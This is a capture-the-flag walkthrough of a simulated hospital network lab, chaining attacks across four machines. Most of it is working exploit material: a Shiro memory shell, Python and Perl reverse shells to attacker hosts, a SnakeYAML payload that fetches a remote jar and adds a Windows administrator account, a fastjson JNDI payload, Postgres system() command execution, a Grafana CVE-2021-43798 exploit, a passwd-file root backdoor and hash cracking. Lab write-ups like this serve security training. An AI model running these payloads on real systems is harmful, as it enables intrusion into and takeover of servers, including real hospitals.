Spring and Autumn Cloud Mirror Simulation Shooting Range Hospital Practical Operation

[[Simulation Target - Hospital]]#

Overview#

In this scenario, you will play the role of a penetration testing engineer sent to test the network security of a hospital. Your goal is to successfully gain access to all servers to assess the company's network security status. There are a total of 4 flags in this target, distributed across different target machines.

Target Architecture

Information Gathering#

The fscan scan yielded the following content:

There is a website and a heapdump file on port 8080, access the /actuator directory

http://39.99.225.90:8080/actuator

Visit the website and log in to the backend with weak credentials

Vulnerability Exploitation#

After logging into the backend, shiro is detected

Unable to brute force the key, the previous heapdump file contains the key

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

Brute force chain

Execute command

Generate memory shell, connect with Ant Sword

Privilege Escalation#

Look for files with SUID permissions, vim.basic can directly edit files as root

Reverse shell from Ant Sword to the cloud server

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

Need to upgrade to an interactive terminal.

python3 -c "import pty;pty.spawn('/bin/bash')"

script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color

Modify /etc/passwd using vim.basic for privilege escalation

openssl passwd -1 -salt 123 123456

Generate password

Add an account in the /etc/passwd file

hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash

flag01#

After adding, switch to the newly added account using su, this server is web01, obtain the value of flag01

su hacker

Reference: https://cloud.tencent.com/developer/article/1711865

Internal Network Scanning#

Run fscan for scanning

172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None Redirect URL: http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34 code:200 len:2005   title:Medical Management Backend
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:Hospital Backend Management Platform
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file

Two assets were discovered

http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass 
http://172.30.12.236:8080 code:200 len:3964   title:Hospital Backend Management Platform

There is a nacos service on the internal network 172.30.12.6 with the default password nacos/nacos
http://172.30.12.236:8080 has a fastjson service

flag02#

Use venom to proxy the internal network, admin listens on the port, agent initiates the connection:

./admin_macos_x64 -lport 9999

./agent_linux_x64 -rhost x.x.x.x(vps ip) -rport 9999

Access the nacos application

http://172.30.12.6:8848/nacos/

Read the configuration file

datasource:

mysql:

url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true

username: root

password: P@ssWord!!!

In the rollback configuration file of db-config, you can see the malicious configuration jar package, the content is roughly as follows, initially thought it was to roll back to the following configuration, but after resetting the environment several times, testing found that rollback was not needed, the following is the manual configuration file

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
  ]]
]

Utilize tools for exploitation

Need to compile the malicious payload, reference project: https://github.com/artsploit/yaml-payload

Just modify the content of AwesomeScriptEngineFactory.java, since the target is a Windows machine, you can add an account, and the target server has also opened port 3389

public AwesomeScriptEngineFactory() {
	try {
		Runtime.getRuntime().exec("net user lca Lca@123 /add");
		Runtime.getRuntime().exec("net localgroup administrators lca /add");
	} catch (IOException e) {
		e.printStackTrace();
	}
}

Then compile using Java 1.8, must use Java 1.8 to compile

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

Upload to the web01 server (the one with flag01), start a python service on web01 to allow web02 (172.30.12.6) to download the malicious jar package, then use the tool NacosExploitGUI_v3.9 to send the request, the jar path is the path of the python started web service

java -jar NacosExploitGUI_v3.9.jar

web01 receives the request, indicating that 172.30.12.6 has downloaded the malicious payload, next is to verify whether the account has been added successfully

Set up a proxy on the local computer using proxifier, connect to 3389

Connection successful, obtain flag02, this server is web02

Nacos related vulnerabilities:

Nacos Internal Cluster Raft Deserialization Vulnerability
Nacos JRaft Hessian Deserialization Vulnerability Exploitation Tool

flag03#

Another machine has a fastjson vulnerability

Without going out to the internet, start JNDI on 172.30.12.5 (web01)

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}

Need to enable lower-level proxy on yakit

Obtain flag03, this machine is web03

flag04#

To access the last machine from the local computer, a second-layer internal network proxy is needed. This machine has grafana+postgres services, and grafana has weak credentials, allowing direct login to the backend.

The grafana backend can execute postgres commands, reverse a low-privilege shell to the web03 server

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

On web3, download https://github.com/A-D-Team/grafanaExp, use the above exp (CVE-2021-43798) to read the account password, then log in to the postgres account

./grafanaExp exp -u http://172.30.54.12.:3000/

Read the account password postgres@123, log in using psql

psql -h 172.30.54.12 -U postgres -W

postgres=# select version();

# Check that the administrator's password is in md5 format
postgres=# SHOW is_superuser;

Use hashcat to crack, the database root password is P@ssw0rd123

hashcat -w 4 -m 0 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt -O

Then log in with the root user for privilege escalation, use the absolute path for psql

sudo /usr/local/postgresql/bin/psql

Input \? to switch to command line, find flag04

Reference#

https://h0ny.github.io/posts/Hospital-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/#grafana-unauthorized-arbitrary-file-reading-cve-2021-43798